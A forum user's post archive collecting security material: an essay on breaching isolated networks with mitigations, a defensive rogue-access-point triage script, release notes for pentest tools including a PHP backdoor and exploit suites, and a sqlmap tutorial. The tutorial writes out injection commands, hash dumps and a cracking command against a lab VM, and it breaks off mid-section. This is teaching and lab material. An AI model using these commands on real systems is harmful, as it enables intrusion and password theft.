Everything posted by Nytro

[h=1]Penetrating and Achieving Persistence in Highly Secured Networks[/h]
By: Bogdan Botezatu

Only a couple of years ago, cyber-criminals almost exclusively targeted Internet-connected end-users and companies. Now, high profile attacks target isolated, highly secure corporate or business environments. This paper describes the challenges of breaching such systems, achieving persistence for as long as possible and payload delivery mechanisms.

Ever since governments and companies adopted the Internet on a massive scale, cyber-criminals have become interested in breaching these critical infrastructures and monetizing them in various ways, with particular focus on disruption and information theft. The continuous siege from outside hostile parties has prompted businesses, enterprises, governments and mission-critical service companies such as utility providers to isolate their networks and render them inaccessible (or limit their accessibility) to the outside world. As a rule, the more critical the network is, the higher the degree of isolation.

[h=2]How is successful penetration carried out in isolated environments?[/h]
One of the most frequent mistakes when deploying a highly secure network is allowing it to be extended without the intervention of a network administrator. Many times, employees trade security for usability without even realizing they are exposing the network to outside threats. Wireless access points installed without notification and without proper security, public and private network bridging through proxy servers or the installation of other devices for tethering (i.e. mobile phones or 3G modems) can and will annihilate any safety mechanism the network administrator has in place.

An advanced persistent threat attack begins with either exploiting one of the technical vulnerabilities exposed above, or by social engineering the user into breaking the security protocols of the organization, such as the restriction on plugging a USB drive into computers that are part of the private network. The goal of an advanced persistent threat is gaining prolonged access to an organization’s resources for monitoring or sabotage.

Figure 1: Vulnerable spots of a protected network. Wireless extensions and unauthorized gateways to the Internet expose the network to outside attackers.

Exploitation of an unauthorized extension of the network with wireless devices is the easiest method by which a cyber-criminal in close proximity can gain access to a protected environment. In the absence of a strong audit of the network configuration, legitimate users could add a wireless router in a spare Ethernet outlet or even bridge a wireless connection to work in access point mode. Most of the time, these are not deliberate acts of sabotage, but fatal mistakes aimed at enhancing usability of a restrictive networking environment (i.e. sharing the local internet connection with a smartphone or creating a wireless connection in the meeting room without consent from the network administrator). This way, any nearby attacker can probe the Wi-Fi space for unprotected or poorly-secured networks, then use open-source tools to attack WEP, WPA, LEAP or even VPNs and other proprietary wireless technologies[1]. Once the network has been identified, cracking the rudimentary encryption would allow the attacker to connect to the network to access resources.

Mitigation: As a system administrator, you should always disable any Ethernet outlet that is not in permanent use directly from the patch panel in the server room. Configure your DHCP server to lease IPs by MAC addresses only. Talk to employees about the importance of keeping the network isolated at all times. Make them understand that any modification to the network infrastructure will have disastrous effects. Use Wi-Fi space monitoring tools to detect wireless signals originating from your facility. A simple $10 key fob Wi-Fi signal detector is often enough to identify illegal access points in your organization.

Unregulated access to the internet via 3G modems or 3G tethering defeats the purpose of isolating the network environment. Whenever the user connects to the internet through a personal device from a machine that is part of the isolated network, they become perfect targets for blended threats – malware delivered via well formatted e-mail messages that trick the user into either downloading an infected and apparently innocuous attachment (such as a PDF or document file) or prompt the user to visit a legitimate website hosting malware.

Mitigation: Enforce security policies on all computers connected to the network. Disable or render USB ports physically inaccessible to prevent storage devices from connecting to the PC. This way, users can’t inadvertently plant malware and can’t move stolen information outside of the network. Block Bluetooth and wireless on host computers to disallow file transfers and interconnection with user-owned devices.

Personal storage and multimedia devices arbitrarily plugged into network computers can act as highly effective vectors not only for malware, but also for the information that escapes the network to the attacker’s command and control server. This approach, although less effective than directly sending data to the attacker via the Internet, has proven much more successful in high-profile attacks such as the Flamer incident[2].

Last, but not least, mind the physical security of the facility. Even the most secured networking environment is useless if physical access to the facility, data center or server room is lax or unregulated. Skilled social engineers can cut their way through office buildings; determined attackers can convince or coerce personnel with access to the building (employees, janitorial team, maintenance crew) to plant devices for them and open security breaches at the network perimeter. The Darpa-funded Pwnie Express products[3], for instance, are disguised as power strips and can be connected to the network, then used by attackers for persistent access to the network over 3G.

[h=2]Achieving persistence in isolated environments[/h]
For long-term exploitation of the isolated network, attackers use a combination of malware tools that take care of deployment, data and password gathering, scanning the network perimeter and reporting. These tools keep a low profile and are specially designed to evade antivirus detection. The evasion is possible because, most of the time, the cyber-criminal team behind the attack uses brand-new code that has never been seen in the wild by antivirus vendors. Zero-day exploitation against client software plays a key role in the stealthy dissemination of the payload across the network, aided by unconventional malware programming using less known APIs and next to no obfuscation of the malicious code.

A key advantage of an isolated environment is that it is considered clean and virus-free. By design, such environments allow no intrusion from the outside, as they are rarely connected to other networks. More than that, one of the most effective means of defense against malware is only partially functional: in the absence of a permanent connection to the internet to deliver hourly malware signature updates, the antivirus uses only outdated signatures and behavioral patterns – two technologies that are highly ineffective against brand-new malicious code engineered to conceal suspicious behavior.

We know advanced malicious code used in breaching isolated networks often comes unencrypted, unpacked and needs no internet connection to operate. These features are critical in evading antivirus detection that monitors code changes, entropy and typical malicious behavior. This was the case of Flamer, the world’s largest piece of malware, which avoided detection by having the exact opposite features of modern, commercial malware. In the absence of an antivirus solution to flag the intrusion, it is up to the network administrator to mitigate a possible infection by constantly monitoring network traffic and ensuring that security policies are enforced.

Figure 2: The circuit of a Flamer-infected device: the employee is used both as a vector of infection and as a carrier for stolen data.

[h=2]Payload delivery and operation mechanism[/h]
One of the most frequently-encountered misconceptions is that a piece of malware is only harmful when it can actively communicate with the command and control server. While this is mostly true for consumer-grade malware that specializes in sending spam, harvesting addresses or manipulating banking transactions, the outlook is different for military-grade e-threats the size and complexity of Stuxnet, Duqu or Flamer. Malware specializing in cyber-espionage rarely relies on the local connection to the Internet to siphon data outside of the perimeter. That approach would likely trigger firewall alerts; the huge amount of data sent to the C&C server is also likely to be visible to packet inspection applications such as Wireshark, which would compromise the operation. More likely, the attackers use an employee’s removable device as transportation between the isolated network and an unmonitored, compromised workstation at the employee’s home, for instance.

Not all malware is tailored for espionage and persistence; some is rather focused on delivering a payload or fulfilling a mission. This was the case of Stuxnet, the world’s first piece of malware tailored to subvert an industrial system to compromise the production process at the Natanz-based uranium enrichment facility in Iran. The e-threat was particularly designed to seize control of the Siemens Simatic WinCC SCADA applications controlling centrifuge machines and did not affect computers or networks that did not meet specific architecture requirements.

[h=2]Conclusion[/h]
Isolated networks are the ultimate fortresses, but they are penetrable. The ecosystem is as safe as its weakest link: the human user, be it employee, system or network administrator. The Stuxnet and Flamer incidents have demonstrated that even the most secured networks are no match for cyber-weapons, instruments designed to go where no piece of malware has gone before. These instruments, which likely share the same origin, prove that highly-skilled cyber-criminal groups can always take the game one step further and bring more and more sophisticated threats to outsmart defense mechanisms.

[1] Jeremy Faircloth, Penetration Tester’s Open Source Toolkit, third edition – Elsevier, 2011
[2] Bogdan Botezatu, FLAME – The Story of Leaked Data Carried by Human Vector | Bitdefender Labs
[3] Power Pwn | Pwnie Express

[h=3]About The Author[/h]
Bogdan Botezatu, Senior E-Threat Analyst
Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the web without protection or rodeo with wild Trojan horses. He believes that most things in life can be beaten with strong heuristics and that antimalware research is like working for a secret agency: you need to stay focused at all times, but you get all the glory when you catch the bad guys.

Source: Penetrating and Achieving Persistence in Highly Secured Networks | HOTforSecurity
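As an added example that is not part of the article above, a triage script for the Wi-Fi space monitoring mitigation: it takes a scan of nearby radios (here in a constructed KEY=value format, as a survey tool or monitoring probe might export it) and the inventory of access points the administrator actually deployed, then ranks every radio it cannot account for. The scan records, inventory, SSID names and the -60 dBm "inside the building" threshold are all constructed assumptions.

```python
"""Rogue access point triage over a Wi-Fi scan.
Added example, not the article's own code; all data below is constructed."""
from dataclasses import dataclass

WEAK_SECURITY = {"OPEN", "WEP"}   # joinable outright or crackable with public tools
STRONG_SIGNAL_DBM = -60           # heuristic assumption: this strong usually means indoors

@dataclass(frozen=True)
class ScanRecord:
    ssid: str
    bssid: str          # upper-case MAC of the radio
    channel: int
    security: str       # OPEN, WEP, WPA, WPA2
    signal_dbm: int

@dataclass(frozen=True)
class Finding:
    severity: str       # HIGH, MEDIUM or INFO
    bssid: str
    reason: str

def parse_scan(text):
    """Parse the constructed 'KEY=value' scan format (SSIDs contain no spaces)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(token.split("=", 1) for token in line.split())
        records.append(ScanRecord(
            ssid=fields["SSID"],
            bssid=fields["BSSID"].upper(),
            channel=int(fields["CH"]),
            security=fields["SEC"].upper(),
            signal_dbm=int(fields["SIG"]),
        ))
    return records

def triage(scan, inventory, corporate_ssids):
    """Compare observed radios against the inventory of authorized APs.

    inventory maps BSSID -> the security mode it was deployed with.
    Returns findings ordered HIGH, MEDIUM, INFO, then by BSSID.
    """
    findings = []
    seen = set()
    for r in scan:
        if r.bssid in seen:          # the same radio is often heard more than once
            continue
        seen.add(r.bssid)
        if r.bssid in inventory:
            expected = inventory[r.bssid]
            if r.security != expected:   # deployed AP reconfigured behind the admin's back
                findings.append(Finding("HIGH", r.bssid,
                    f"authorized AP '{r.ssid}' advertises {r.security}, inventory says {expected}"))
            continue
        # Everything below is a radio nobody deployed on purpose.
        if r.ssid in corporate_ssids:
            findings.append(Finding("HIGH", r.bssid,
                f"unknown AP advertising corporate SSID '{r.ssid}' on channel {r.channel}"))
        elif r.security in WEAK_SECURITY and r.signal_dbm >= STRONG_SIGNAL_DBM:
            findings.append(Finding("HIGH", r.bssid,
                f"{r.security} network '{r.ssid}' at {r.signal_dbm} dBm: likely an unauthorized extension"))
        elif r.signal_dbm >= STRONG_SIGNAL_DBM:
            findings.append(Finding("MEDIUM", r.bssid,
                f"unknown {r.security} network '{r.ssid}' at {r.signal_dbm} dBm: verify it is not bridged"))
        else:
            findings.append(Finding("INFO", r.bssid,
                f"distant unknown network '{r.ssid}' at {r.signal_dbm} dBm, probably a neighbour"))
    for bssid in inventory:
        if bssid not in seen:        # an AP that should be on air but is silent
            findings.append(Finding("INFO", bssid, "authorized AP not observed in this scan"))
    rank = {"HIGH": 0, "MEDIUM": 1, "INFO": 2}
    return sorted(findings, key=lambda f: (rank[f.severity], f.bssid))

# Constructed sample data: nothing here comes from a real site.
SAMPLE_SCAN = """\
SSID=CORP-SECURE BSSID=00:11:22:33:44:01 CH=1 SEC=WPA2 SIG=-42
SSID=CORP-SECURE BSSID=00:11:22:33:44:02 CH=6 SEC=WPA SIG=-50
SSID=CORP-SECURE BSSID=de:ad:be:ef:00:01 CH=6 SEC=WPA2 SIG=-47
SSID=MeetingRoom BSSID=AA:BB:CC:DD:EE:FF CH=11 SEC=WEP SIG=-38
SSID=AndroidAP BSSID=02:1A:11:00:00:01 CH=1 SEC=OPEN SIG=-55
SSID=iPhone BSSID=7A:7A:7A:00:00:02 CH=11 SEC=WPA2 SIG=-52
SSID=Neighbour-Net BSSID=66:77:88:99:AA:BB CH=3 SEC=WPA2 SIG=-85
SSID=CORP-SECURE BSSID=00:11:22:33:44:02 CH=6 SEC=WPA SIG=-51
"""
INVENTORY = {
    "00:11:22:33:44:01": "WPA2",
    "00:11:22:33:44:02": "WPA2",
    "00:11:22:33:44:03": "WPA2",
}
CORPORATE_SSIDS = {"CORP-SECURE"}

if __name__ == "__main__":
    for f in triage(parse_scan(SAMPLE_SCAN), INVENTORY, CORPORATE_SSIDS):
        print(f"[{f.severity}] {f.bssid}: {f.reason}")
```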

[h=1]Weevely 1.0[/h]
by Mayuresh on February 5, 2013

Our old post regarding the weevely tiny PHP backdoor can be found here. Recently, an update was released – weevely version 1.0, that brings new modules with a totally refactored structure to assist remote administration tasks and penetration testing.

“Weevely is an unobtrusive PHP backdoor that simulates a telnet-like connection. It is an essential tool for web application attack post-exploitation or web hosting account management. With basic permission to upload PHP files, you only need to generate and upload the “server” PHP code on the target, and run Weevely locally to transmit shell commands.
[*] Backdoor communications are obfuscated into the referrer of regular HTTP requests
[*] Backdoor code is hidden and compact because functions are dynamically injected and not embedded in
[*] Users have modules available to automate interaction with the remote system
[*] Modules implement different techniques to accomplish given tasks, aiming to bypass disabled_functions, safe_mode and other PHP”

[h=2]Changes made in Weevely 1.0:[/h]
[*] Support for Windows and MacOS host environments
[*] Module :net.mount, powered by HTTPfs, that automagically mounts the remote filesystem to a local mountpoint
[*] Module :file.edit to edit remote files with your favourite local text editor
[*] Module :audit.systemfiles to find system files with bad permissions that could affect server security
[*] Module :audit.phpconf to audit common PHP misconfigurations
[*] SOCKS4 and SOCKS5 proxy support
[*] Totally rewritten module base structure to simplify module deployment
[*] Module argument management with argparse
[*] Tons of bug fixes

[h=3]Download weevely:[/h]
Weevely 1.0 – weevely-1.0.tar.gz / Weevely github

Source: Weevely version 1.0! — PenTestIT

[h=1]TLSSLed v1.3[/h]
by Mayuresh on February 6, 2013

We included TLSSLed in our List of SSL Scanners for Penetration Testers! A few days ago, an update was released – TLSSLed version 1.3! This version is the result of testing lots of HTTPS (SSL/TLS) implementations during real-world pen-tests, so it is full of minor improvements and extra checks to identify different behaviors we have found in the wild. Additionally, the tool output has been changed for easy reading and to provide quick information for each finding: negative [-], positive [+], or informational [.] (as well as grouping tests [*] and highlighting warning and error messages [!]).

“TLSSLed is a Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the “openssl s_client” command line tool. The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.”

[h=2]This is the official change log for TLSSLed v1.3:[/h]
[*] All file output goes to a single directory (same file names as in previous versions) instead of to the working local directory.
[*] Change in the date format used for log files. From: 2011-12-30_105055 – To: 20111230-105055
[*] Test if SSL/TLS renegotiation is enabled (NEW check) and if the target service supports secure renegotiation (already in previous versions). If secure renegotiation is not supported, we must check renegotiation by using legacy renegotiation (two new log files are used).
[*] New test to check for legacy renegotiation even when secure renegotiation is supported, just in case the target service supports both.
[*] Test if client certificate authentication is required by the target service. If so, identify the number of CAs accepted and save the list of CAs to a file.
[*] New test to check for HTTP headers using HTTP/1.0 (previous versions) as well as HTTP/1.1 and a valid Host header. New log files created for this.
[*] New error handling code for the initial SSL/TLS verification.
[*] Optimizations in the openssl delays (sleep timers). New DELAY variable to control sleep timers (by default 3 seconds; it was 5 before).
[*] New output indentation.
[*] New output code set for findings: – (negative), + (positive), . (info), * (group of checks) or ! (error/warning).
[*] LOGFILE changed to SSLSCANLOGFILE & ERRFILE changed to SSLSCANERRFILE.
[*] RENEGLEGACY???FILE(s) included in the final listing and removal process.
[*] Several changes to the output messages for the different findings.
[*] Duplication of “Preferred Server Cipher” output message removed.
[*] New check to test for RC4 in the preferred cipher(s) regarding BEAST.
[*] Use of openssl “-prexit” option for some weird target scenarios (CSA).
[*] Added the date and time at the beginning of the output.

This version has been tested on updated versions of Samurai WTF 2.0 (running openssl 1.0.1 and sslscan 1.8.2), Backtrack5 R3 (running openssl 0.9.8k and sslscan 1.8.2), and Mac OS X Mountain Lion 10.8.x (running openssl 0.9.8r and sslscan 1.8.2). Samurai WTF 2.0 is the only one of these three that includes openssl v1.0.x by default, providing support for the TLS v1.1 and v1.2 protocol tests.

[h=3]Download TLSSLed:[/h]
TLSSLed v1.3 – TLSSLed_v1.3.sh

Source: TLSSLed v1.3! — PenTestIT

[h=1]Mobius Forensic Toolkit 0.5.16[/h]
by Mayuresh on February 6, 2013

Mobius Forensic Toolkit is being continuously developed and it has been recently updated! The bug-fix release is Mobius Forensic Toolkit version 0.5.16.

“Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.”

[h=2]Official release notes for Mobius Forensic Toolkit 0.5.16:[/h]
This release features the Turing extension, an extension to handle cryptographic services. It is fully integrated with the Hive (registry) extension, so that when registry files are opened, it automatically records the user account password hashes and tests keywords such as LSA secrets, e-mail passwords, and Internet Explorer Autocomplete, among others. All hashes and passwords found are stored in an SQLite database. The Turing extension exports and imports to/from John The Ripper .pot files and to John The Ripper hash files.

[h=3]Download Mobius Forensic Toolkit:[/h]
Mobius Forensic Toolkit 0.5.16 – mobiusft-0.5.16.tar.gz / mobiusft-0.5.16.tar.bz2 / mobiusft/mobiusft-0.5.16.zip

Source: Mobius Forensic Toolkit 0.5.16! — PenTestIT

[h=1]NOWASP Mutillidae 2.4.3[/h]
by Mayuresh on February 6, 2013

Our first post regarding NOWASP (Codename Mutillidae) can be found here. Recently an update – NOWASP (Codename Mutillidae) version 2.4.3 – was released. This release comes with a new sqlmap target page with hints & links (Menu -> SQLi -> SQLMap Targets) and lots of bug fixes.

“NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiasts to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to administrate a webserver. It is already installed on SamuraiWTF and Rapid7 Metasploitable-2. The existing version can be updated on either. Containing dozens of vulns and hints to help the user, this is an easy-to-use web hacking environment deliberately designed for labs, security enthusiasts, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software.”

[h=2]Official NOWASP (Mutillidae) change log:[/h]
[*] Added login.php page to the sqlmap targets in the menu
[*] Modified several links to open in new windows/tabs rather than taking over main screen
[*] Reduced some unneeded styles
[*] Added links for Firefox add-ons to home page
[*] Added link for sqlmap to home page
[*] Added new page with SQLMap practice targets, link to video, and new hints section

[h=3]Download NOWASP (Mutillidae)[/h]
NOWASP Mutillidae 2.4.3 – LATEST-mutillidae-2.4.3.zip

Source: NOWASP Mutillidae 2.4.3! — PenTestIT

[h=1]SQLNinja 0.2.999-alpha1[/h]
by Mayuresh on February 6, 2013

We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload!

“Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.”

[h=2]Change log for SQLNinja 0.2.999-alpha1:[/h]
[*] Added data extraction module
[*] Added vbscript-based upload
[*] Split big ugly script into modules
[*] Lots of refactoring

[h=3]Download SQLNinja 0.2.999-alpha1:[/h]
SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz

Source: SQLNinja version 0.2.999-alpha1! — PenTestIT

[h=1]WAppEx 2.0![/h]
by Mayuresh on February 6, 2013

Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 – was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility, WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits. Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets, all in one single action. The Test-on-Targets feature automates much of the tasks you would have to do manually in the previous version. Still, in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder!

“WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum from security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.”

[h=2]Changes made to WAppEx 2.0:[/h]
[*] Auto-detect feature deleted from exploits
[*] Browser tool deleted
[*] Exploits and payloads view changed
[*] Exploit Database with the following features added:
  [*] New script syntax and structure
  [*] Searching, selecting, and executing of exploits
  [*] Add/remove database entries (exploits or payloads)
  [*] Add exploits or payloads to the database using either the Exploit Wizard or the script file
  [*] Batch testing of multiple targets against multiple exploits
  [*] Execute multiple instances of one or more payloads (for every running exploit) simultaneously
[*] Following tools added:
  [*] Manual Request
  [*] Dork Finder
  [*] Exploit Editor
  [*] Hidden File Checker
  [*] Neighbor Site Finder
[*] Local File Inclusion analyzer script updated
[*] 24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added:
  [*] Directory Explorer
  [*] CodeExec Bind
  [*] 3 connect-back shells
  [*] Code Execution
  [*] MySQL Dump
  [*] ServerInfo
  [*] 4 command execution payloads
[*] Bug-fixes:
  [*] Find Login Page crashed on start
  [*] Problem with software registration
  [*] Stop button did not work when retrieving data from SQL server
  [*] Problem with saving SQL results
  [*] Crashed when closing Find Login Page
  [*] Status icons were not displayed properly in exploit tabs

[h=3]Download WAppEx:[/h]
WAppEX 2.0 – WAppEx2.0.exe

Source: WAppEx version 2.0! — PenTestIT

[h=1]Sleuth Kit 4.0.2![/h]
by Mayuresh on February 6, 2013

Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features.

“The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs.”

[h=2]Official change log for The Sleuth Kit:[/h]
New Features in Core:
[*] fiwalk is now included.

Bug Fixes in Core:
[*] Fixed fcat to work on NTFS files (still doesn’t support ADS though).
[*] Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added.
[*] NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree.
[*] NTFS code uses sequence number when searching MFT entries for all files.
[*] Libewf detection code change to support v2 API more reliably (ID: 3596212).
[*] NTFS $SII code could crash in rare cases if $SDS was multiple of block size.

Framework:
[*] Added new API to TskImgDB that returns the base name of an image.
[*] Numerous performance improvements to framework.
[*] Removed requirement in framework to specify module extension in pipeline configuration file.
[*] Added blackboard artifacts to represent both operating system and network service user accounts.

Java Bindings:
[*] More methods to query files.
[*] Methods to get current directory when being added to DB.
[*] Modified class structure a bit.
[*] More lazy loading for children / parents.
[*] Better exception throwing from C++.

[h=3]Download The Sleuth Kit:[/h]
The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip / sleuthkit-framework-win32-4.0.2.zip / sleuthkit-4.0.2.tar.gz

Source: The Sleuth Kit 4.0.2! — PenTestIT

[h=1]Java SE Proof Of Concept Code ≈ Packet Storm[/h]
-
[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM Author: Jeremy Druin Twitter: @webpwnized YouTube Channel: webpwnized's channel - YouTube Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/) ecorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along with the video. 
-------------------------------------------------- Running SQLMAP Help -------------------------------------------------- --help Help -hh Double the help -------------------------------------------------- Running SQLMAP "Manually" -------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner -------------------------------------------------- Capturing Request To Pass To SQLMAP -------------------------------------------------- URL: http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login -------------------------------------------------- Running SQLMAP with "auto-parse" -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> -------------------------------------------------- Running SQLMAP with various features -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> --banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current 
database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth -------------------------------------------------------------------------------- -------------------- Enumerate DBMS database tables, columns, structure (schema) -------------------------------------------------------------------------------- -------------------- --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate -------------------------------------------------- Extracting data -------------------------------------------------- --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell -------------------------------------------------- Listing columns from tables 
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject

--------------------------------------------------
Advanced: Modifying injections
--------------------------------------------------
SELECT * FROM accounts WHERE username='' AND password='''

./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string

--------------------------------------------------
Advanced: Dealing with inconsistent results
--------------------------------------------------
select User, Password from mysql.user

versus

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

--------------------------------------------------
Cracking MySQL Password Hashes
--------------------------------------------------
John the Ripper Command Line
/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password Hashes in MySQL Format
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

--------------------------------------------------
Understanding sqlmap O/S Shell
--------------------------------------------------
